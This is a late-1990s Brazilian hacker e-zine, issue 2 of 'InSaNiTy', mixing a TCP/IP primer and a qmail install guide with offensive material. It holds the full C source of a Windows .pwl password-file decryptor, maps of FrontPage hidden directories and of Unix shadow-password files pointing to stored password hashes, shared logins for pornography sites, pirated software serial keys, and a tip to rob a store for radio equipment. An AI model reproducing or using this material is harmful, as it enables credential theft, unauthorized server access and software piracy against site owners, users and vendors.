                     MELHOR VISUALIZACAO NO WORDPAD
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<    InSaNiTy    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//////////////////No-02-Novembro e Dezembro/98 e Janeiro/99\\\\\\\\\\\\\\\\\
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY
              
            NAO CONFIE NA POLICIA, ELES SAO UMA RACA FILHA DA PUTA
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 
     
    REVISTA MENSAL:TODA PRIMEIRA SEGUNDA-FEIRA DO MES NA NOSSA HOME PAGE

INDICE
******

1- INTRODUCAO ......................................dexter07        
2- FRONT PAGE SERVER ...............................dexter07
3- ANARCHY .........................................WORMBOY 
4- XXX PASSWORDS ...................................dexter07 
5- TCP/IP ..........................................dexter07
6- SOURCE CODES ....................................dexter07
7- RADIO PIRATA ....................................dexter07
8- LOCALIZACAO DE PASSWORDS ........................dexter07
9- FRASES ..........................................dexter07
10- QMAIL ..........................................dexter07
  10.1- INSTALANDO
  10.2- TESTANDO 
11- BONUS ..........................................dexter07 
12- MEMBERS 

OBS.:O autor(es) nao se responsabiliza por nada que voce venha a fazer 
depois de ler esse zine
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

**************
*1-INTRODUCAO*
**************

A edicao no 02 da zine, eh de novembro e dezembro de 98, porque talvez em
dezembro seja um pouco dificil de escreve-la, entao resolvemos fazer uma 
edicao soh pra esses dois meses, mas a zine veio bastante recheada de boas
coisas, esperamos manter esse nivel em todas zines.

*********************
*2-FRONT PAGE SERVER*
*********************

O servidor www do front page acho que eh o mais facil de ser administrado,
alem de rodar em windows nt ele nao exige nenhum conhecimento de nada, 
vou por nessa materia a sua estrutura completa, facilitando assim, de voce
ver suas falhas na seguranca. Esses diretorios sao ocultos, entao assim, 
fica mais dificil pra voce ve-los, mas com a lista que vou por aqui embaixo
voce pode testar em qualquer host e ver se ele usa ou nao.A legenda eh a
seguinte: 
Diretorio : Arquivos do diretorio : Funcao do diretorio ou arquivos
----------------------------------------------------------------------------
_overlay : *.gif : Gifs padrao que acompanham o servidor, usados geralmente 
                   nas paginas de erro e etc...

_derived : *.htx e *.gif : Paginas e gifs gerados na hora como por exemplo
                           nos servicos de procura, em que as paginas sao 
                           geradas na hora.

_borders : top.htm,left.htm,    :Sao os arquivos html usados nas paginas com 
           right.htm,bottom.htm  frames.

_fpclass : *.class : Arquivos class java, como por exemplo no uso de 
                     plugins e etc.. 

_vti_bin : shtml.dll e shtml.exe : Programas usados para administracao do 
                              servidor.
           fpcount.exe : Contador de visitas das paginas.

_vti_bin/_vti_aut : author.dll e author.exe : Programas usados para 
                                              administracao do servidor.

_vti_cnf : todas paginas html e figuras : Uma especie de backup do sistema,
                                         mas todos diretorio tem, nao apenas
                                         o raiz.

_vti_log : Logs : Logs do servidor, esse diretorio so existe no diretorio 
                  raiz.

_vti_pvt : access.cnf : O controle de acesso do servidor HTTP

           administrators.pwd : Senhas encriptadas dos administradores do 
                                sistema, usa a mesma encriptacao do unix, 
                                soh que sem shadow.
           
           authors.pwd : mesma coisa que o de cima, mas sao as senhas dos
                         autores das paginas.
         
           service.pwd : mesma coisa soh que com senhas de todos servicos.

           users.pwd : mesma coisa, soh que com as senhas dos usuarios 
                       finais.

           writeto.cnf : e-mail do administrador do sistema.
                         
_vti_map : Imagens Mapeadas : Contem todas as imagens mapeadas do sistema.

----------------------------------------------------------------------------
ATEnCAO: esses diretorios sao os diretorios padroes da instalacao, portanto
nao temos culpa se o administrador, pensou um pouco e mudou os diretorios.

*********** 
*3-ANARCHY*
***********

Nosso amigo e editor da zine WORMBOY, sumiu e nao pudemos esse mes publicar 
a sessao de anarquia.
Espero que na proxima ele apareca e possa fazer isso.


*****************
*4-XXX PASSWORDS*
*****************

URL: http://www.megapussy.com/members/
username: zena69
password: zena69

URL: http://www.8teens.com/members/
username: fish
password: pie

URL: http://www.stinkypinky.com/members1/index.html
username: jam
password: man

URL: http://www.sexunusual.com/members/
username: test
password: test

URL: http://www.eurosluts.net/secured/index.html
username: jose
password: jose


**********
*5-TCP/IP*
**********

Em qualquer computador na internet, podem ser colocados 65.000 servicos, ou
seja cada computador tem 65.000 portas, soh que cada servico necessita de
memoria para rodar, entao, 65.000 servicos nao eh pra qualquer computador.
Servicos que rodam sob protocolo TCP/IP geralmente sao chamados de daemons,
que em ingles significa demonios, esses programas, ficam residentes na 
memoria do computador, e ficam aguardando a entrada de pedidos, e ao 
receberem um pedido, identificam o tipo de servico e passam-no para o daemon
respectivo. Resumindo, sao as portas, por exemplo voce entra num determinado
host por exemplo "host.com" mas para se conectar digamos ao servico ftp 
desse host,o seu programa de ftp manda o tipo de servico que quer e o host 
manda voce pra porta destinada pra esse servico. Nos principais unixes do 
mercado, inclusive linux, a lista dos servicos disponiveis, fica no arquivo
"/etc/services" o formato desse arquivo eh mais ou menos assim:
obs: se nao entendeu muito bem leia o exemplo no fim da materia

------------------------------------------------
echo        7/tcp
ftp        21/tcp
finger     79/tcp
uucp      540/tcp
pop       109/tcp
snmp      161/udp      #SNMP snmpd routed/gated
------------------------------------------------
* A primeira coluna eh o nome do servico
* A segunda corresponde ao numero da porta que o servico usa
* A terceira corresponde ao protocolo que transportara o servico
* A quarta coluna eh comentario sobre o servico, e nao eh obrigatoria

Abaixo vou por alguns conceitos de servicos:

DOMAIN- o universo da rede na qual voce esta operando, por exemplo 
"host.com"

FTP- File Transfer Protocol- eh o protocolo de transferencia de arquivos 
entre computadores que usam tcp/ip

ICMP- Internet Control Message Protocol- parte do IP, que trata mensagens de
controle e erros

NFS- Network File System- protocolo que usa IP para permitir um conjunto de
computadores, acessar entre eles seus sistemas de arquivos, como se 
estivessem no mesmo local.

SMTP- Simple Mail Transfer Protocol- sistema de correio, entre um computador
e outro.


EXEMPLO:

Se voce nao entendeu nada que tava escrito lah em cima, leia esse exemplo 
que provavelmente agora voce entendera

1- O usuario abre seu navegador ou browser, ou como queira chamar,e digita
www.host.com

2- O navegador interpreta o comando do usuario, montando um pacote IP que 
sera enviado ao servidor www que ele chamou, que no caso eh www.host.com.
O navegador usa uma tabela semelhante ao arquivo "/etc/services" que eh 
verificada para finalizar o pacote IP, logo apos, ele eh enviado para o 
servidor www.

3- Ja no sevidor www, o daemon inetd, responde ao pedido solicitado, que no
caso do servidor www eh a porta 80, verificando no arquivo "etc/services" 
qual daemon que cuidara desse pedido, entao o inetd cai fora deixando a 
comunicao direta entre o servidor e o cliente, e voltando pra atender a 
outro pedido.

4- O daemon que trata o servico www (porta 80) busca o referido arquivo e,
transforma-o em pacotes IP e envia-os para o cliente (navegador).

5- Os pacotes, ao estarem disponibilizados no computador cliente, sao
organizados e mostram o conteudo pelo navegador, no caso do servico www.E 
tudo isso em alguns milesimos de segundo.

Obs: Outros servicos como ftp ou gopher, tem outros tratamentos, que 
explicarei em alguma zine no futuro.

E ja que estamos falando de tcp/ip, resolvi colocar algumas portas padrao 
de alguns dos servicos mais comuns:
Legenda= porta/protocolo:servico

23/tcp:Telnet
21/tcp:Ftp
80 ou 8080/tcp:Http
110/tcp:Pop3
25/tcp:Pop
70/tcp:Gopher
79/tcp:Finger
7/tcp:Echo
7/udp:Echo
88/tcp:Kerberos
144/tcp:News
144/udp:News
666/tcp:Doom (eh o jogo mesmo)
 
****************
*6-SOURCE CODES*
****************

Esta eh a nova sessao da zine, que publicara codigos fonte de varios 
progrmas uteis.

Nome: Glide
Linguagem: C++
O que faz: Descripta senhas de arquivos ".pwl" do windows, que sao os 
arquivos do windows que conteem as senhas da rede dial-up.
Autor: desconhecido
Obs.: soh descripta pwls de algumas versoes do windows95, nao todas.

----------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <stdlib.h>
#include <ctype.h>
#include <conio.h>

unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

void main (int argc,char *argv[]) {
	FILE *fd;
	int 	i,j,k;
	int	size;
	char ch;
	char *name;
	int cracked;
	int sizemask;
	int maxr;
	int rsz;
	int pos;
	int Rall[300]; /* recource allocation table */


	if (argc<2) {
	printf("usage: glide filename (username)");
	exit(1);
	}

	/* read PWL file */

	fd=fopen(argv[1],"rb");
	if(fd==NULL) {
	printf("can't open file %s",argv[1]);
	exit(1);
	}
	size=0;
	while(!feof(fd)) {
	Data[size++]=fgetc(fd);
	}
	size--;
	fclose(fd);

	/* find username */
	name=argv[1];
	if(argc>2) name=argv[2];
	printf("Username: %s\n",name);

	/* copy encrypted text into keystream */
	cracked=size-0x0208;
	if(cracked<0) cracked=0;
	if(cracked>1000) cracked=1000;
	memcpy(keystream,Data+0x208,cracked );

	/* generate 20 bytes of keystream */
	for(i=0;i<20;i++) {
	ch=toupper(name[i]);
	if(ch==0) break;
	if(ch=='.') break;
	keystream[i]^=ch;
	};
	cracked=20;


	/* find allocated recources */

	sizemask=keystream[0]+(keystream[1]<<8);
	printf("Sizemask: %04X\n",sizemask);

	for(i=0;i<256;i++) Rall[i]=0;

	maxr=0;
	for(i=0x108;i<0x208;i++) {
		if(Data[i]!=0xff) {
			Rall[Data[i]]++;
			if (Data[i]>maxr) maxr=Data[i];
		}
	}
	maxr=(((maxr/16)+1)*16);
      /* recource pointer table size appears to be divisable by 16 */

	/* search after recources */

	Rpoint[0]=0x0208+2*maxr+20+2;	/* first recource */
	for(i=0;i<maxr;i++) {
	/* find size of current recource */
	pos=Rpoint[i];
	rsz=Data[pos]+(Data[pos+1]<<8);
	rsz^=sizemask;
	printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
	if( (Rall[i]==0) && (rsz!=0) ) {
	printf("unused resource has nonzero size !!!\n");
	printf("If last line produced any : You may try to recover\n");
	printf("press y to attempt recovery\n");
	ch=getch();
	if(ch!='y') exit(0);
	rsz=2;
	i-=1;
	}

	pos+=rsz;

	/* Resources have a tendency to have the wrong size for some reason */
	/* check for correct size */

	if(i<maxr-1) {
	while(Data[pos+3]!=keystream[1]) {
	printf(":",Data[pos+3]);
	pos+=2; /* very rude may fail */
		}
		}

	pos+=2;	/* include pointer in size */
	Rpoint[i+1]=pos;
	}
	Rpoint[maxr]=size;

	/* insert Table data into keystream */
	for(i=0;i <= maxr;i++) {
	keystream[20+2*i]^=Rpoint[i] & 0x00ff;
	keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
	}
	cracked+=maxr*2+2;

	printf("%d bytes of keystream recovered\n",cracked);

	/* decrypt resources */
	for(i=0;i < maxr;i++) {
	rsz=Rpoint[i+1]-Rpoint[i];
	if (rsz>cracked) rsz=cracked;
	printf("Recource[%d] (%d)\n",i,rsz);
	for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
	printf("\n");
	}


	exit(0);
}

----------------------------------------------------------------------------

Compile e bom proveito.

****************
*7-RADIO PIRATA*
****************

Resolvi trocar a sessao de UUEncode, porque brevemente estaremos botando em 
nossa home page varios programas, e entao no lugar dessa sessao coloquei 
um pequeno esquema de como fazer uma radio pirata, pra voce tocar o que 
quiser nela e nao ser obrigado a ouvir pagode(pagode Sux!!) o dia interio.
Voce vai precisar de :
*Algo que toque musica como cd player, toca disco, toca fita, microfone, 
qualquer merda q funcione. (Obrigatorio)
*Mesa de Som pra caso queire por exemplo falar no microfone com uma musica
de fundo, ai voce abaixa o volume da musica,etc... (Opcional)
*Equalizador (Opcional)
*Gerador de Estereo, se voce quiser que a musica saia estereo. (Opcional)
*Transmissor de FM, transforma o som em ondas FM pra serem enviadas.
(Obigatorio)
*Antena pra mandar as ondas (Obrigatorio)

COMO FAZER:

Se voce quiser fazer uma bem simples, somente ligue o som no gerador de FM, 
e esse na antena e pronto. Se quiser algo mais complexo, Ligue os aparelhos
na mesa de som, a mesa no equalizador, o equalizador no gerador de estereo e
esse no gerador Fm e depois na antena.

CUSTO MEDIO:
Somente com as coisas Obrigatorias: de 500 a 1000.
Completo: de 2000 a 5000.
Dica: assalte a loja, que sai mais barato.
 
***********************************************
*8-LOCALIZACAO DE PASSWORDS EM VARIOS SISTEMAS*
***********************************************

Para fins de aprendizagem e aumento de conhecimentos em computadores, alguns
sistemas e seus passwords com shadow aonde geralmente ficam:

AIX 3                      /etc/security/passwd   -ou-        
                           /tcb/auth/files/<1a letra do username>/<username>

A/UX 3.0s                  /tcb/files/auth/?/                              

BSD4.3-Reno                /etc/master.passwd                        

ConvexOS 10                /etc/shadpw                                     

ConvexOS 11                /etc/shadow                                     

DG/UX                      /etc/tcb/aa/user/                             

EP/IX                      /etc/shadow  

HP-UX                      /.secure/etc/passwd 

IRIX 5                     /etc/shadow   

Linux 1.1                  /etc/shadow  

SCO Unix #.2.x             /tcb/auth/files/<1a letra do username>/<username>                                                                                                                           

SunOS 4.1+c2               /etc/security/passwd.adjunct         

SunOS 5.0                  /etc/shadow

Unix System V Release 4.0  /etc/shadow                                    

Unix System V Release 4.2  /etc/security/

Ultrix 4                   /etc/auth

UNICOS                     /etc/udb                                          

LINUXES                    /etc/passwd-  -ou-   
                           /etc/shadow-  -ou-
                           /etc/-passwd  -ou-
                           /etc/-shadow

Obs.:Geralmente o arquivo do linux com os passwds fica com chmod 600, o que
o torna invisivel a guest users, e que voce soh consegue pegar logado como
usuario registrado, ou talvez root.

**********
*9-FRASES*
**********

Um sistema soh eh inseguro quando eh mal configurado.
                   (Phiber Optik) 



**********
*10-QMAIL*
**********

ONDE PEGAR : http://www.qmail.org
             http://www.qmail.com

**************************
*10.1- INSTALANDO O QMAIL*
**************************

Apos baixar o qmail, coloque-o num novo diretorio "/var/qmail". Utilizando
se dos comandos gunzip e tar para descompacta-lo :

# gunzip qmail-1.1.0.gz
# tar xvf - qmail-1.1.0

Caso voce nao queira o software nessa localizacao, altere-a no arquivo 
"conf-mail". Querendo ainda alterar o nome das contas dos usuarios que irao
administrar o correio eletronico, altere no arquivos "conf-users" e 
"conf-groups". Essas alteracoes devem ser feitas antes da compilacao.

O proximo passo eh criarmos as contas dos usuarios e grupos nos arquivos do
linux, assim:

No arquivo "etc/group", crie os seguintes grupos:

qmail:*:2107:
nofiles:*:2108:

e no arquivo "etc/passwd", crie as seguintes contas:

alias:*:7790:2108::/var/qmail/alias:/bin/true
qmaild:*:7791:2108::/var/qmail:/bin/true
qmaill:*:7792:2108::/var/qmail:/bin/true
qmailp:*:7793:2108::/var/qmail:/bin/true
qmailq:*:7794:2107::/var/qmail:/bin/true
qmailr:*:7795:2107::/var/qmail:/bin/true
qmails:*:7796:2107::/var/qmail:/bin/true

Para preparar a instalacao,execute os procedimentos:

1-COmpile os programas

# make

2-Crie as paginas formatadas do manual

# make man 

3-Crie a arvore de diretorio do QMAIL

# make setup

4-Execute o verificador e certifique-se de que nao aparecem mensagens de 
erro

# make check

5-Verifique com atencao o arquivo install.ctl

# ./qmail-config

6-Verifique com atencao o arquivo install.alias, no qual deve haver no 
minimo essas linhas:

# (cd ~alias; touch .qmail-postmaster .qmail-mailer-daemon .qmail-root)
# chmod 644 ~alias/.qmail*

7-Verifique o arquivo Install.mbox e veja se esta ok

8-Verifique o arquivo qmail-upgrade.0. e veja se esta ok 

Como o linux jah vem com um programa de expedicao de email que eh o sendmail
por isso devemos substitui-lo pelo qmail assim:

9-Verifique o arquivo install.boot.

Deve-se nesse arquivo trocar qualquer chamada ao SendMail pelo QMAIL

10-Derrube o daemon do sendmail.Primeiro tente com kill -STOP, caso hajam
filhos deste processo use kill -CONT

11-Faca um link do arquivo do sendmail para o qmail assim:

# mv /usr/lib/sendmail /usr/lib/sendmail.bak
# ln -s /var/qmail/bin/sendmail /usr/lib/sendmail

12- COnfigure o Qmail-smtpd no "etc/inetd.conf" com a seguinte linha:

smtp stream tcp nowait qmaild /var/qmail/bin/tcp-rnv tcp-env /var/qmail/bin/
qmail-smtpd

Obs:tudo na mesma linha

13-Restarte o computador ou de um kill -HUP PID no daemon inetd

14-Desabilite todos os programas sendmail e binmail existentes do linux.
O metodo mais apropriado eh colocar todos em chmod 0.
A localizacao desse eh:
/usr/bin/sendmail , /usr/lib/sendmail.bak , /usr/lib/sendmail.mx , 
/bin/mail , /usr/libexec/mail.local.

***********************
*10.2-TESTANDO O QMAIL*
***********************

Para fazer o teste e ver se tudo correu bem, basta voce simular uma conexao
com voce mesmo assim:

----------------------------------------------------------------------------
% telnet 127.0.0.1
Trying 127.0.0.1
Connected to 127.0.0.1
Escape character is `^]¥.
220 domain ESMTP
helo dude
250-domain
250-PIPELINING
250 8BITMIME
mail usuario@127.0.0.1
250 ok
data
354 go ahead
Subject: TESTANDO

ISSO EH UM TESTE
.
250 ok 81234567 qp 12345
quit
221 domain
Connection closed by foreign host.
%
----------------------------------------------------------------------------
Agora verifique na sua caixa postal se a mensagem enviada chegou sem 
problemas.

**********
*11-BONUS*
**********

Na sessao de bonus  tem alguns serials uteis, de programas comuns e nao
de programas que voce nunca ouviu falar e nem sabe se existe e nem pra que
servem.

--------------
GetRight 3.XX:
--------------
056003866292
871004615447
784282547514
061191728237
484647502854
689820559609
439733006859
125286143113
902374345316
093371438225
--------------
Serv-U Ftp Server:
--------------
Somente por na primeira linha no arquivo serv-u.ini 
Registrationkey=WPdkYz/vSfM,Free Registered Version
Registrationkey=VgnFvj4ovvE,Shareware Sucks
--------------
winZIP:
--------------
Free Registered Version-8608631C
Shareware Sucks-439328B5
--------------
Gif Construction Set:
--------------
Free Registered Version-YUDAH
Shareware Sucks-YYLGL
--------------
Opera 3.XX:
--------------
Nome: RAGGER
Company: CORE
Serial: CORE0g4FsRin
-----ou-----
Nome: Esteem 
Company: Esteem 
Serial: EsteMRmzhNct
--------------
WinAmp 2.04:
--------------
The Keyboard Caper-31954830
--------------

************                 
*12-MEMBERS*
************

dexter07-dexter07@bigfoot.com
WORMBOY-skiller@imagelink.com.br

POR FAVOR, SE VOCE FOR COPIAR ALGUM TEXTO INSIRA A SEGUINTE LINHA
(INSANITY ZINE,EDICAO XX,AUTOR:XXXX)

ATENCAO!!!:PROCURAM-SE EDITORES PRA ESSA ZINE, SE VOCE SABE BASTANTE SOBRE 
ALGUM DESSES ASSUNTOS, MAIL-US


                    ++++++++++++++++++++++++++++++++++++
+++++++++++++++++++ http://members.xoom.com/insanityzine +++++++++++++++++++
                    ++++++++++++++++++++++++++++++++++++ 

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

III  NN      NN  SSSSSSSSS    AAA    NN      NN  III  TTTTTTTT  YY      YY
III  NNN     NN  SS          AA AA   NNN     NN  III     TT      YY    YY
III  NN NN   NN  SS         AA   AA  NN NN   NN  III     TT       YY  YY
III  NN  NN  NN  SSSSSSSSS  AA   AA  NN  NN  NN  III     TT         YY
III  NN   NN NN  SSSSSSSSS  AAAAAAA  NN   NN NN  III     TT         YY
III  NN    NNNN         SS  AA   AA  NN    NNNN  III     TT         YY
III  NN     NNN  SSSSSSSSS  AA   AA  NN     NNN  III     TT         YY

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

